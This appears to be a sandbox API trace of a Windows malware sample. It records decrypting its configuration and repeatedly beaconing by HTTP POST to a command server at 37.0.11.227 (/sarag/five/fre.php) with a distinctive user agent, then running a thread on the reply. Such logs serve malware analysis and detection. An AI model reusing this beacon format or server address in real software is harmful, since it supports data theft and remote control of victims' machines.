getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0212.562] GetProcessHeap () returned 0x690000 [0212.563] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0212.563] GetProcessHeap () returned 0x690000 [0212.563] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0212.563] GetProcessHeap () returned 0x690000 [0212.564] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0212.564] GetProcessHeap () returned 0x690000 [0212.564] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0212.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.566] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0212.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.580] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0212.594] GetProcessHeap () returned 0x690000 [0212.594] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0212.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.596] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0212.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.598] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0212.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.600] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.600] GetProcessHeap () returned 0x690000 [0212.601] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0212.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.603] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0212.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.605] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0212.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.606] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0212.606] GetProcessHeap () returned 0x690000 [0212.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0212.607] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.615] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0212.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.617] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0212.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.618] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0212.618] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.619] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0212.619] GetProcessHeap () returned 0x690000 [0212.619] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0212.619] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0212.619] GetProcessHeap () returned 0x690000 [0212.619] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0212.619] socket (af=2, type=1, protocol=6) returned 0x4f4 [0212.620] connect (s=0x4f4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0212.662] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0212.662] GetProcessHeap () returned 0x690000 [0212.662] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0212.662] GetProcessHeap () returned 0x690000 [0212.662] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0212.663] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0212.664] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0212.664] GetProcessHeap () returned 0x690000 [0212.664] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6aff80 [0212.664] GetProcessHeap () returned 0x690000 [0212.665] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0212.666] GetProcessHeap () returned 0x690000 [0212.666] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0212.666] GetProcessHeap () returned 0x690000 [0212.666] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0212.667] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0212.668] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0212.668] GetProcessHeap () returned 0x690000 [0212.668] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0212.668] GetProcessHeap () returned 0x690000 [0212.668] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0212.668] send (s=0x4f4, buf=0x6ad508*, len=242, flags=0) returned 242 [0212.669] send (s=0x4f4, buf=0x6aba40*, len=159, flags=0) returned 159 [0212.669] GetProcessHeap () returned 0x690000 [0212.669] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0212.669] recv (in: s=0x4f4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0212.755] GetProcessHeap () returned 0x690000 [0212.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0212.756] GetProcessHeap () returned 0x690000 [0212.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0212.756] GetProcessHeap () returned 0x690000 [0212.757] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aff80 | out: hHeap=0x690000) returned 1 [0212.757] GetProcessHeap () returned 0x690000 [0212.757] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0212.757] closesocket (s=0x4f4) returned 0 [0212.758] GetProcessHeap () returned 0x690000 [0212.758] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0212.760] GetProcessHeap () returned 0x690000 [0212.760] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0212.760] GetProcessHeap () returned 0x690000 [0212.761] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0212.761] GetProcessHeap () returned 0x690000 [0212.761] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0212.761] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x710) returned 0x4f4 [0212.764] Sleep (dwMilliseconds=0xea60) [0212.766] GetProcessHeap () returned 0x690000 [0212.766] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0212.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.768] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0212.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.778] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0212.792] GetProcessHeap () returned 0x690000 [0212.792] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0212.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.794] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0212.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.807] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0212.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.809] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.809] GetProcessHeap () returned 0x690000 [0212.809] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0212.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.810] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0212.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.811] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0212.812] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.812] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0212.813] GetProcessHeap () returned 0x690000 [0212.813] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0212.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.814] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0212.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.815] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0212.815] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.816] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0212.817] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.818] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0212.818] GetProcessHeap () returned 0x690000 [0212.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0212.818] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0212.819] GetProcessHeap () returned 0x690000 [0212.819] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0212.819] GetProcessHeap () returned 0x690000 [0212.820] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0212.820] GetProcessHeap () returned 0x690000 [0212.820] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0212.820] GetProcessHeap () returned 0x690000 [0212.820] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0212.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.822] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0212.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.828] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0212.838] GetProcessHeap () returned 0x690000 [0212.838] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0212.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.840] CryptImportKey (in: hProv=0x6af078, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0212.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.841] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0212.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.842] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.842] GetProcessHeap () returned 0x690000 [0212.843] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0212.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.844] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0212.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.845] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0212.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.847] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0212.847] GetProcessHeap () returned 0x690000 [0212.847] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0212.848] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.849] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0212.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.850] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0212.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.852] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0212.853] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.853] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0212.853] GetProcessHeap () returned 0x690000 [0212.853] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0212.853] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0212.853] GetProcessHeap () returned 0x690000 [0212.853] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0212.854] socket (af=2, type=1, protocol=6) returned 0x4f8 [0212.854] connect (s=0x4f8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0212.882] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0212.882] GetProcessHeap () returned 0x690000 [0212.882] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0212.882] GetProcessHeap () returned 0x690000 [0212.882] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0212.883] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0212.885] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0212.885] GetProcessHeap () returned 0x690000 [0212.885] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0212.885] GetProcessHeap () returned 0x690000 [0212.885] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0212.885] GetProcessHeap () returned 0x690000 [0212.885] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0212.886] GetProcessHeap () returned 0x690000 [0212.886] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0212.886] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0212.887] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0212.887] GetProcessHeap () returned 0x690000 [0212.887] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0212.887] GetProcessHeap () returned 0x690000 [0212.888] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0212.889] send (s=0x4f8, buf=0x6ad508*, len=242, flags=0) returned 242 [0212.891] send (s=0x4f8, buf=0x6aba40*, len=159, flags=0) returned 159 [0212.891] GetProcessHeap () returned 0x690000 [0212.891] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0212.891] recv (in: s=0x4f8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0213.028] GetProcessHeap () returned 0x690000 [0213.028] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0213.029] GetProcessHeap () returned 0x690000 [0213.029] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0213.029] GetProcessHeap () returned 0x690000 [0213.030] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0213.030] GetProcessHeap () returned 0x690000 [0213.031] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0213.031] closesocket (s=0x4f8) returned 0 [0213.032] GetProcessHeap () returned 0x690000 [0213.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0213.032] GetProcessHeap () returned 0x690000 [0213.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0213.032] GetProcessHeap () returned 0x690000 [0213.033] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0213.033] GetProcessHeap () returned 0x690000 [0213.033] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0213.033] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x70c) returned 0x4f8 [0213.035] Sleep (dwMilliseconds=0xea60) [0213.037] GetProcessHeap () returned 0x690000 [0213.037] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0213.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.038] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0213.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.045] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0213.053] GetProcessHeap () returned 0x690000 [0213.053] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0213.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.054] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0213.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.055] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0213.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.057] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0213.057] GetProcessHeap () returned 0x690000 [0213.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0213.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.059] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0213.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.069] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0213.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.070] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0213.070] GetProcessHeap () returned 0x690000 [0213.070] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0213.072] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.073] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0213.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.075] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0213.076] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.076] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0213.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.077] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0213.077] GetProcessHeap () returned 0x690000 [0213.077] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0213.077] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0213.078] GetProcessHeap () returned 0x690000 [0213.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0213.078] GetProcessHeap () returned 0x690000 [0213.079] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0213.079] GetProcessHeap () returned 0x690000 [0213.079] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0213.079] GetProcessHeap () returned 0x690000 [0213.079] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0213.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0213.080] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 